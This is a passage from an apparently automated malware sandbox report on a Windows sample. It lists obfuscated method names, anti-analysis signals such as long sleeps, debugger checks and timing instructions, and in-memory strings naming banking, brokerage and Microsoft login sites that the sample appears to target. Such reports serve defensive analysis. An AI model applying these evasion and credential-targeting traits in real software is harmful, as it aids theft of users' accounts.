Source: 0.2.file.exe.3f1eb10.3.raw.unpack, ofaYTDjimBkQ1tJyJa.cs | High entropy of concatenated method names: 'qWruY5Sj06', 'ufcu8dss1U', 'pOXXHZuBR1', 'LCpXAYQhA4', 'P2eus00SGO', 'CavuR0lmib', 'lkAuPuPG8k', 'enQucPVnMO', 'G8muvfq8Fu', 'bGDuhq1BIT'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, srWQghpqgVE1cjis3v.cs | High entropy of concatenated method names: 'IfVbihna6j', 'XPubI4tBQp', 'jZHbTT5f8L', 'PSibtGXXyM', 'lFbb42VjVF', 'gotTMLOUnl', 'cAfTj5yeTJ', 'je2TE8FVgC', 'B2ZTYEA1gX', 'BmfT5hkm3v'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, yNFEmX52GUkxqP0cWI.cs | High entropy of concatenated method names: 'QoBlp3a3yX', 'LndlnqmKRm', 'FEql7fWeLB', 'K1slVSmxKB', 'U2YlLtFeUG', 'MHplxNgkdb', 'k6elrsQoYB', 'gsClSmvHQh', 'zQAlKE0nHa', 'UGWleX6kTE'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, xYVE7hI2PXwfFj7a0A.cs | High entropy of concatenated method names: 'Dispose', 'LiZA5Y42Cm', 'Vb2UnAedte', 'L16rMk92ma', 'uLiA8MX6P2', 'JT0Azk2wYG', 'ProcessDialogKey', 'H4NUHNFEmX', 'vGUUAkxqP0', 'RWIUUsaMru'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, GV3ENqm9nOtfltcevd.cs | High entropy of concatenated method names: 'U7XIciPvwm', 'hvfIvoeKF2', 'q8RIhOQSmj', 'bVEIQ8DuFH', 'DQGIMRLk9t', 'vGAIjqnngh', 'vOhIEJ6m5R', 'frSIY4DA7w', 'gm7I5QLdjw', 'navI8bsTqY'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, a84WmJERGriZY42Cmw.cs | High entropy of concatenated method names: 'v9BlOMvASq', 'ChTluNHuWO', 'nKhllIhBKA', 'db6ladVW45', 'h7nl2QCZrk', 'efvlBsGuhj', 'Dispose', 'cqkX6CFtKD', 'DuoXI5S1qR', 'GjWXGPVFd5'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, T4oIFJ1xNMwq14SFNm.cs | High entropy of concatenated method names: 'EH8T9IwO9B', 'P3iTfEp6DE', 'dvJG7uLeQU', 'ekmGVKpChC', 'fYlGLJ0XNV', 'ILoGxKDK6Y', 'HVCGrZ7Zvb', 'DV0GSYiwmb', 'iNPGKy5iUy', 'Xm5Gep3cTH'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, Da8u6PAAXu9xTDJKMvl.cs | High entropy of concatenated method names: 'ac1y87GF1M', 'yeXyzUj6Rk', 'TCYaHJlwXQ', 'HsOaAG9afu', 'R2xaUMdZqX', 'kpWaqdXTyO', 'jVDaD3Gdri', 'u9baiXHO6u', 'vCya6vZqQZ', 'JwbaI8RFUP'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, P7V2jfKk5ItC1mSWNt.cs | High entropy of concatenated method names: 'AWXtd5tYdY', 'FH6tNAv8Mf', 'KgctCT1DTw', 'hl4t0x4FVV', 'p5Qt9Ikkh3', 'J8EtWwIMPA', 'VEctfAD9ZH', 'D16tmfYrik', 'ItXtJVwRc5', 'mSkt1igigS'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, eYM3OSADOgcpGu4Lcuh.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xZ6wlfkJM8', 'VBfwyDjM8o', 'kRPwab4X0I', 'IX9ww6h45X', 'Gi0w2x0h0V', 's5mwZOIWdf', 'jd9wBZSoNV'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, w2o2KVP5dAxWanL25L.cs | High entropy of concatenated method names: 'uXk3mby4kR', 'xwG3JC3XH3', 'nfK3pxhF0q', 'lrh3n3ZtQG', 'Crx3VUBgg7', 'mLO3Lb803v', 'M8U3rpUZ47', 'kOT3SgNMUE', 'trr3e6PrKU', 'KRs3sX1mTw'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, HAdcPkcDXOuy9yjflL.cs | High entropy of concatenated method names: 'OiKOeMEBCn', 'cEiORl9WdW', 'oPsOcCvQhd', 'iktOvb0gF9', 'QdsOnO2uJQ', 'wLuO7oumD4', 'WfDOVhpKEI', 'aJaOLr25tg', 'w9EOxYjwVs', 'XRAOrntPa6'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, Re1S5OzPjZnhEAiBK6.cs | High entropy of concatenated method names: 'AWCyWufYty', 'tBMymCqUBK', 'vHMyJ5oTad', 'fZOypyIdtX', 'ES3ynZ67L8', 'WFsyV9Tbwj', 'fjYyL80OsG', 'TiZyBc8AF3', 'aMGydXDcAk', 'JS8yN3ZleY'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, OaMru18VfkBQmTAwDx.cs | High entropy of concatenated method names: 'rdcyGwk1Wk', 'UFFyT8p1i5', 'qE6ybtcDol', 'zdYytCfOIN', 'ItkylFKkDt', 'Lajy4ni3KC', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, QidqLQAHuB61dbGJR1C.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ti8ysvk6qb', 'ppMyRwd2Z4', 'zppyPpra27', 'cGuycXjDZB', 'Yblyv2wiCi', 'P77yhKsb5Q', 'AbmyQepY2J'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, vcGrCi4KDgYFK31I25.cs | High entropy of concatenated method names: 'GAQqisxhIB', 'Atwq6s0gmm', 'eCaqIp77jO', 'YT0qG8cMLt', 'lEPqTppuSe', 'tOFqbu67ao', 'v6sqtYAljI', 'PySq4SedLY', 'C5cqkMQfiE', 'N2pqopAoXu'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, J6KlYCQuneAOxHcpDE.cs | High entropy of concatenated method names: 'wBNuo1MjB9', 'VGnugiDnYM', 'ToString', 'F3cu6xydPl', 'atquIMywaH', 'kqouG9EJdL', 'bYXuTvIqyn', 'Ch0ubPpN3X', 'v7WutbCd9h', 'FeAu4bYknh'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, J7i1jUrwDExDXx5G5E.cs | High entropy of concatenated method names: 'tgCt61XCdp', 'AV7tGC1gZ3', 'oZ7tbHFUVJ', 'hltb8B0lKG', 'wpwbzb4HLi', 'BpstHFMnyc', 'A4UtAExLKW', 'kOBtU8e4Qj', 'PRytqVkdRi', 'wVxtDBsexN'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, ucaqXhhFDTQh8vlJxT.cs | High entropy of concatenated method names: 'ToString', 'OZjFsALQK2', 'XoEFnmPUIq', 'LnCF7evQHY', 'kGiFVe5kwP', 'hRcFLraRXv', 'P1nFx7uWUZ', 'c6aFrQdFBK', 'Vl5FSexORa', 'vjoFKQ6KLZ'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, liXxucGPXAD00a5u5a.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'bbDU5DZ7xp', 'IeYU8omIa9', 'RvwUzFY286', 'A75qHOT9Wj', 'BaKqA2Mpug', 'EwqqUdYr2u', 'UPCqqUs63V', 'Uuu40XgHA0OGvIUv55M'
Source: 0.2.file.exe.3f1eb10.3.raw.unpack, bGj3S0AqMqQWUNssvxa.cs | High entropy of concatenated method names: 'psqa8vIyBu', 'lA5azr6GRX', 'AZlwHiaH9N', 'tro9LOCFfxEBbKYSPKr', 'KaVMRaCTTUXiP3xQsNF', 'YwUJNCCv2WdoR52JHK6', 'TgnmbhCJiHjnT4BlGM0'
Source: 0.2.file.exe.7510000.5.raw.unpack, eINg4dDTquMH7LHiXG.cs | High entropy of concatenated method names: 'IkpAtV3ENq', 'BnOA4tfltc', 'UrjAoAjsrM', 'AFRAgEQ4oI', 'kSFAONmlrW', 'TghAFqgVE1', 'CDSWMnkD6MFTm0g7nv', 'gsW7sopAYdQYvmYeLk', 'oocAAllTXa', 'LLOAqfjmjm'
Source: 0.2.file.exe.7510000.5.raw.unpack, IqQJjOU3Dce860oeqQ.cs | High entropy of concatenated method names: 'ChfCKvpbt', 'dpV0qLUSp', 'ItLWGMKLC', 'COtfkENPm', 'hqEJvfhII', 'fWI1bxqit', 'bwSlcWG1DyFQT4bObe', 'T6OuXCcCLYxlMJ4y2L', 'BJZMvDqOeUSjPuSEGn', 'aSAXrB08G'
Source: 0.2.file.exe.7510000.5.raw.unpack, f24LqMJrjAjsrM0FRE.cs | High entropy of concatenated method names: 'RGMG0UlXZ6', 'X7sGWG9UsG', 'qwEGm2dnC6', 'QedGJFLQcA', 's9qGOdEoej', 'C7NGF7QMgJ', 'AcXGu0l8L1', 'WxpGXuEk3v', 'aXYGl6CdVJ', 'C72Gy8Hbud'
Source: 0.2.file.exe.7510000.5.raw.unpack, ofaYTDjimBkQ1tJyJa.cs | High entropy of concatenated method names: 'qWruY5Sj06', 'ufcu8dss1U', 'pOXXHZuBR1', 'LCpXAYQhA4', 'P2eus00SGO', 'CavuR0lmib', 'lkAuPuPG8k', 'enQucPVnMO', 'G8muvfq8Fu', 'bGDuhq1BIT'
Source: 0.2.file.exe.7510000.5.raw.unpack, srWQghpqgVE1cjis3v.cs | High entropy of concatenated method names: 'IfVbihna6j', 'XPubI4tBQp', 'jZHbTT5f8L', 'PSibtGXXyM', 'lFbb42VjVF', 'gotTMLOUnl', 'cAfTj5yeTJ', 'je2TE8FVgC', 'B2ZTYEA1gX', 'BmfT5hkm3v'
Source: 0.2.file.exe.7510000.5.raw.unpack, yNFEmX52GUkxqP0cWI.cs | High entropy of concatenated method names: 'QoBlp3a3yX', 'LndlnqmKRm', 'FEql7fWeLB', 'K1slVSmxKB', 'U2YlLtFeUG', 'MHplxNgkdb', 'k6elrsQoYB', 'gsClSmvHQh', 'zQAlKE0nHa', 'UGWleX6kTE'
Source: 0.2.file.exe.7510000.5.raw.unpack, xYVE7hI2PXwfFj7a0A.cs | High entropy of concatenated method names: 'Dispose', 'LiZA5Y42Cm', 'Vb2UnAedte', 'L16rMk92ma', 'uLiA8MX6P2', 'JT0Azk2wYG', 'ProcessDialogKey', 'H4NUHNFEmX', 'vGUUAkxqP0', 'RWIUUsaMru'
Source: 0.2.file.exe.7510000.5.raw.unpack, GV3ENqm9nOtfltcevd.cs | High entropy of concatenated method names: 'U7XIciPvwm', 'hvfIvoeKF2', 'q8RIhOQSmj', 'bVEIQ8DuFH', 'DQGIMRLk9t', 'vGAIjqnngh', 'vOhIEJ6m5R', 'frSIY4DA7w', 'gm7I5QLdjw', 'navI8bsTqY'
Source: 0.2.file.exe.7510000.5.raw.unpack, a84WmJERGriZY42Cmw.cs | High entropy of concatenated method names: 'v9BlOMvASq', 'ChTluNHuWO', 'nKhllIhBKA', 'db6ladVW45', 'h7nl2QCZrk', 'efvlBsGuhj', 'Dispose', 'cqkX6CFtKD', 'DuoXI5S1qR', 'GjWXGPVFd5'
Source: 0.2.file.exe.7510000.5.raw.unpack, T4oIFJ1xNMwq14SFNm.cs | High entropy of concatenated method names: 'EH8T9IwO9B', 'P3iTfEp6DE', 'dvJG7uLeQU', 'ekmGVKpChC', 'fYlGLJ0XNV', 'ILoGxKDK6Y', 'HVCGrZ7Zvb', 'DV0GSYiwmb', 'iNPGKy5iUy', 'Xm5Gep3cTH'
Source: 0.2.file.exe.7510000.5.raw.unpack, Da8u6PAAXu9xTDJKMvl.cs | High entropy of concatenated method names: 'ac1y87GF1M', 'yeXyzUj6Rk', 'TCYaHJlwXQ', 'HsOaAG9afu', 'R2xaUMdZqX', 'kpWaqdXTyO', 'jVDaD3Gdri', 'u9baiXHO6u', 'vCya6vZqQZ', 'JwbaI8RFUP'
Source: 0.2.file.exe.7510000.5.raw.unpack, P7V2jfKk5ItC1mSWNt.cs | High entropy of concatenated method names: 'AWXtd5tYdY', 'FH6tNAv8Mf', 'KgctCT1DTw', 'hl4t0x4FVV', 'p5Qt9Ikkh3', 'J8EtWwIMPA', 'VEctfAD9ZH', 'D16tmfYrik', 'ItXtJVwRc5', 'mSkt1igigS'
Source: 0.2.file.exe.7510000.5.raw.unpack, eYM3OSADOgcpGu4Lcuh.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xZ6wlfkJM8', 'VBfwyDjM8o', 'kRPwab4X0I', 'IX9ww6h45X', 'Gi0w2x0h0V', 's5mwZOIWdf', 'jd9wBZSoNV'
Source: 0.2.file.exe.7510000.5.raw.unpack, w2o2KVP5dAxWanL25L.cs | High entropy of concatenated method names: 'uXk3mby4kR', 'xwG3JC3XH3', 'nfK3pxhF0q', 'lrh3n3ZtQG', 'Crx3VUBgg7', 'mLO3Lb803v', 'M8U3rpUZ47', 'kOT3SgNMUE', 'trr3e6PrKU', 'KRs3sX1mTw'
Source: 0.2.file.exe.7510000.5.raw.unpack, HAdcPkcDXOuy9yjflL.cs | High entropy of concatenated method names: 'OiKOeMEBCn', 'cEiORl9WdW', 'oPsOcCvQhd', 'iktOvb0gF9', 'QdsOnO2uJQ', 'wLuO7oumD4', 'WfDOVhpKEI', 'aJaOLr25tg', 'w9EOxYjwVs', 'XRAOrntPa6'
Source: 0.2.file.exe.7510000.5.raw.unpack, Re1S5OzPjZnhEAiBK6.cs | High entropy of concatenated method names: 'AWCyWufYty', 'tBMymCqUBK', 'vHMyJ5oTad', 'fZOypyIdtX', 'ES3ynZ67L8', 'WFsyV9Tbwj', 'fjYyL80OsG', 'TiZyBc8AF3', 'aMGydXDcAk', 'JS8yN3ZleY'
Source: 0.2.file.exe.7510000.5.raw.unpack, OaMru18VfkBQmTAwDx.cs | High entropy of concatenated method names: 'rdcyGwk1Wk', 'UFFyT8p1i5', 'qE6ybtcDol', 'zdYytCfOIN', 'ItkylFKkDt', 'Lajy4ni3KC', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.file.exe.7510000.5.raw.unpack, QidqLQAHuB61dbGJR1C.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ti8ysvk6qb', 'ppMyRwd2Z4', 'zppyPpra27', 'cGuycXjDZB', 'Yblyv2wiCi', 'P77yhKsb5Q', 'AbmyQepY2J'
Source: 0.2.file.exe.7510000.5.raw.unpack, vcGrCi4KDgYFK31I25.cs | High entropy of concatenated method names: 'GAQqisxhIB', 'Atwq6s0gmm', 'eCaqIp77jO', 'YT0qG8cMLt', 'lEPqTppuSe', 'tOFqbu67ao', 'v6sqtYAljI', 'PySq4SedLY', 'C5cqkMQfiE', 'N2pqopAoXu'
Source: 0.2.file.exe.7510000.5.raw.unpack, J6KlYCQuneAOxHcpDE.cs | High entropy of concatenated method names: 'wBNuo1MjB9', 'VGnugiDnYM', 'ToString', 'F3cu6xydPl', 'atquIMywaH', 'kqouG9EJdL', 'bYXuTvIqyn', 'Ch0ubPpN3X', 'v7WutbCd9h', 'FeAu4bYknh'
Source: 0.2.file.exe.7510000.5.raw.unpack, J7i1jUrwDExDXx5G5E.cs | High entropy of concatenated method names: 'tgCt61XCdp', 'AV7tGC1gZ3', 'oZ7tbHFUVJ', 'hltb8B0lKG', 'wpwbzb4HLi', 'BpstHFMnyc', 'A4UtAExLKW', 'kOBtU8e4Qj', 'PRytqVkdRi', 'wVxtDBsexN'
Source: 0.2.file.exe.7510000.5.raw.unpack, ucaqXhhFDTQh8vlJxT.cs | High entropy of concatenated method names: 'ToString', 'OZjFsALQK2', 'XoEFnmPUIq', 'LnCF7evQHY', 'kGiFVe5kwP', 'hRcFLraRXv', 'P1nFx7uWUZ', 'c6aFrQdFBK', 'Vl5FSexORa', 'vjoFKQ6KLZ'
Source: 0.2.file.exe.7510000.5.raw.unpack, liXxucGPXAD00a5u5a.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'bbDU5DZ7xp', 'IeYU8omIa9', 'RvwUzFY286', 'A75qHOT9Wj', 'BaKqA2Mpug', 'EwqqUdYr2u', 'UPCqqUs63V', 'Uuu40XgHA0OGvIUv55M'
Source: 0.2.file.exe.7510000.5.raw.unpack, bGj3S0AqMqQWUNssvxa.cs | High entropy of concatenated method names: 'psqa8vIyBu', 'lA5azr6GRX', 'AZlwHiaH9N', 'tro9LOCFfxEBbKYSPKr', 'KaVMRaCTTUXiP3xQsNF', 'YwUJNCCv2WdoR52JHK6', 'TgnmbhCJiHjnT4BlGM0'
                      Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\find.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match, File source: Process Memory Space: file.exe PID: 6704, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\find.exe API/Special instruction interceptor: Address: 7FFBCB7AD324
                      Source: C:\Windows\SysWOW64\find.exe API/Special instruction interceptor: Address: 7FFBCB7AD7E4
                      Source: C:\Windows\SysWOW64\find.exe API/Special instruction interceptor: Address: 7FFBCB7AD944
                      Source: C:\Windows\SysWOW64\find.exe API/Special instruction interceptor: Address: 7FFBCB7AD504
                      Source: C:\Windows\SysWOW64\find.exe API/Special instruction interceptor: Address: 7FFBCB7AD544
                      Source: C:\Windows\SysWOW64\find.exe API/Special instruction interceptor: Address: 7FFBCB7AD1E4
                      Source: C:\Windows\SysWOW64\find.exe API/Special instruction interceptor: Address: 7FFBCB7B0154
                      Source: C:\Windows\SysWOW64\find.exe API/Special instruction interceptor: Address: 7FFBCB7ADA44
                      Source: C:\Users\user\Desktop\file.exe Memory allocated: 1460000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\file.exe Memory allocated: 2E30000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\file.exe Memory allocated: 4E30000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\file.exe Memory allocated: 9220000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\file.exe Memory allocated: 7D40000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\file.exe Memory allocated: A220000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\file.exe Memory allocated: B220000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F8096E rdtsc 3_2_00F8096E
                      Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\find.exe Window / User API: threadDelayed 2780
                      Source: C:\Windows\SysWOW64\find.exe Window / User API: threadDelayed 7192
                      Source: C:\Users\user\Desktop\file.exe API coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\find.exe API coverage: 2.6 %
                      Source: C:\Users\user\Desktop\file.exe TID: 5420 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\find.exe TID: 2056 Thread sleep count: 2780 > 30
                      Source: C:\Windows\SysWOW64\find.exe TID: 2056 Thread sleep time: -5560000s >= -30000s
                      Source: C:\Windows\SysWOW64\find.exe TID: 2056 Thread sleep count: 7192 > 30
                      Source: C:\Windows\SysWOW64\find.exe TID: 2056 Thread sleep time: -14384000s >= -30000s
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe TID: 3276 Thread sleep time: -75000s >= -30000s
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe TID: 3276 Thread sleep count: 36 > 30
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe TID: 3276 Thread sleep time: -54000s >= -30000s
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe TID: 3276 Thread sleep count: 37 > 30
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe TID: 3276 Thread sleep time: -37000s >= -30000s
                      Source: C:\Windows\SysWOW64\find.exe Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\find.exe Code function: 5_2_006DC7D0 FindFirstFileW,FindNextFileW,FindClose, 5_2_006DC7D0
                      Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
                      Source: e151968.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
                      Source: e151968.5.dr Binary or memory string: discord.comVMware20,11696494690f
                      Source: e151968.5.dr Binary or memory string: AMC password management pageVMware20,11696494690
                      Source: e151968.5.dr Binary or memory string: outlook.office.comVMware20,11696494690s
                      Source: e151968.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                      Source: e151968.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                      Source: e151968.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                      Source: e151968.5.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
                      Source: e151968.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                      Source: e151968.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                      Source: e151968.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                      Source: e151968.5.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
                      Source: e151968.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                      Source: e151968.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                      Source: e151968.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                      Source: e151968.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                      Source: e151968.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                      Source: e151968.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                      Source: e151968.5.dr Binary or memory string: tasks.office.comVMware20,11696494690o
                      Source: e151968.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                      Source: find.exe, 00000005.00000002.3858129273.0000000000A10000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
                      Source: YpbicUfTwt.exe, 00000007.00000002.3863130535.000000000161F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                      Source: e151968.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                      Source: e151968.5.dr Binary or memory string: dev.azure.comVMware20,11696494690j
                      Source: e151968.5.dr Binary or memory string: global block list test formVMware20,11696494690
                      Source: e151968.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                      Source: e151968.5.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
                      Source: e151968.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                      Source: e151968.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                      Source: e151968.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                      Source: e151968.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                      Source: e151968.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                      Source: e151968.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                      Source: firefox.exe, 00000009.00000002.1878266068.00000201EBBAC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT
                      Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\find.exe Process queried: DebugPort
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F8096E rdtsc 3_2_00F8096E
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00417993 LdrLoadDll, 3_2_00417993
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F3C0F0 mov eax, dword ptr fs:[00000030h] 3_2_00F3C0F0
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F820F0 mov ecx, dword ptr fs:[00000030h] 3_2_00F820F0
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F3A0E3 mov ecx, dword ptr fs:[00000030h] 3_2_00F3A0E3
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_01000115 mov eax, dword ptr fs:[00000030h] 3_2_01000115
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FC60E0 mov eax, dword ptr fs:[00000030h] 3_2_00FC60E0
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F480E9 mov eax, dword ptr fs:[00000030h] 3_2_00F480E9
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FC20DE mov eax, dword ptr fs:[00000030h] 3_2_00FC20DE
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F380A0 mov eax, dword ptr fs:[00000030h] 3_2_00F380A0
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FD80A8 mov eax, dword ptr fs:[00000030h] 3_2_00FD80A8
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_01014164 mov eax, dword ptr fs:[00000030h] 3_2_01014164
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F4208A mov eax, dword ptr fs:[00000030h] 3_2_00F4208A
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F6C073 mov eax, dword ptr fs:[00000030h] 3_2_00F6C073
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F42050 mov eax, dword ptr fs:[00000030h] 3_2_00F42050
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FC6050 mov eax, dword ptr fs:[00000030h] 3_2_00FC6050
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_010061C3 mov eax, dword ptr fs:[00000030h] 3_2_010061C3
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FD6030 mov eax, dword ptr fs:[00000030h] 3_2_00FD6030
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F3A020 mov eax, dword ptr fs:[00000030h] 3_2_00F3A020
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F3C020 mov eax, dword ptr fs:[00000030h] 3_2_00F3C020
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F5E016 mov eax, dword ptr fs:[00000030h] 3_2_00F5E016
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_010161E5 mov eax, dword ptr fs:[00000030h] 3_2_010161E5
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FC4000 mov ecx, dword ptr fs:[00000030h] 3_2_00FC4000
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FE2000 mov eax, dword ptr fs:[00000030h] 3_2_00FE2000
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F701F8 mov eax, dword ptr fs:[00000030h] 3_2_00F701F8
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FBE1D0 mov eax, dword ptr fs:[00000030h] 3_2_00FBE1D0
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FBE1D0 mov ecx, dword ptr fs:[00000030h] 3_2_00FBE1D0
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FC019F mov eax, dword ptr fs:[00000030h] 3_2_00FC019F
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F3A197 mov eax, dword ptr fs:[00000030h] 3_2_00F3A197
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FFC188 mov eax, dword ptr fs:[00000030h] 3_2_00FFC188
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F80185 mov eax, dword ptr fs:[00000030h] 3_2_00F80185
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FE4180 mov eax, dword ptr fs:[00000030h] 3_2_00FE4180
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F46154 mov eax, dword ptr fs:[00000030h] 3_2_00F46154
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F3C156 mov eax, dword ptr fs:[00000030h] 3_2_00F3C156
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FD8158 mov eax, dword ptr fs:[00000030h] 3_2_00FD8158
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_010060B8 mov eax, dword ptr fs:[00000030h] 3_2_010060B8
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_010060B8 mov ecx, dword ptr fs:[00000030h] 3_2_010060B8
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FD4144 mov eax, dword ptr fs:[00000030h] 3_2_00FD4144
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FD4144 mov ecx, dword ptr fs:[00000030h] 3_2_00FD4144
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F70124 mov eax, dword ptr fs:[00000030h] 3_2_00F70124
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FEA118 mov ecx, dword ptr fs:[00000030h] 3_2_00FEA118
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FEA118 mov eax, dword ptr fs:[00000030h] 3_2_00FEA118
